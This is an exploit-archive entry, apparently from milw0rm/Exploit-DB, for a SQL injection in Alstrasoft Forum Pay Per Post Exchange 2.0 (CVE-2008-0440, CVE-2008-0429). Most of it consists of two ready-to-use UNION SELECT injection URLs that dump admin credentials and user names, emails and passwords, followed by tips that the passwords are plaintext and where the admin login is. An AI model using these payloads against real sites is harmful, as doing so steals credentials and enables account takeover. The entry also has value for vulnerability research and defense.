Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection
Author: t0pP8uZz
type: webapps
platform: php
port:
date_added: 2008-01-20
date_updated:
verified: 1
codes: OSVDB-40936;CVE-2008-0440;OSVDB-40411;CVE-2008-0429
tags:
aliases:
screenshot_url:
application_url:
--==+================================================================================+==--
--==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://alstrasoft.com/forum-pay-per-post-exchange.htm
DORK: N/A
DESCRIPTION:
pull admin/user info from the database
EXPLOITS:
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(auser,0x3a,apass),7/**/FROM/**/admin/*
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(username,0x3a,uemail,0x3a,upass),7/**/FROM/**/users/*
NOTE/TIP:
passwords are in plaintext.
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org !
--==+================================================================================+==--
--==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-01-21]